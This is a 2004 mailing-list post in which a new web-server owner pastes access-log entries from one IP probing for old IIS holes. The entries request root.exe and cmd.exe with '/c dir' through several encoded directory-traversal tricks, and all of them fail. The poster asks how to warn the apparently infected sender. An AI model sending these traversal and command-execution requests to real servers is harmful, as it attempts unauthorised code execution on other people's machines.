Hi List, Four days my http server has been online and my access log looks like a war zone from the year 2000. I thought Code Red should of been gone by now.
Although it's nice to see what vulnerabilities are out there. For example: 24.117.53.121 - - [03/Feb/2004:10:30:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 289 24.117.53.121 - - [03/Feb/2004:10:30:21 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 287 24.117.53.121 - - [03/Feb/2004:10:30:21 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 24.117.53.121 - - [03/Feb/2004:10:30:22 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301 24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301 24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 24.117.53.121 - - [03/Feb/2004:10:30:23 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 How would one go about informing this person that there completly hosed? Or is this just a script kiddy? Any thoughts? ===== Ted Katseres ---------------- ------------------------ -------------------------------- __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free web site building tool. Try it! http://webhosting.yahoo.com/ps/sb/
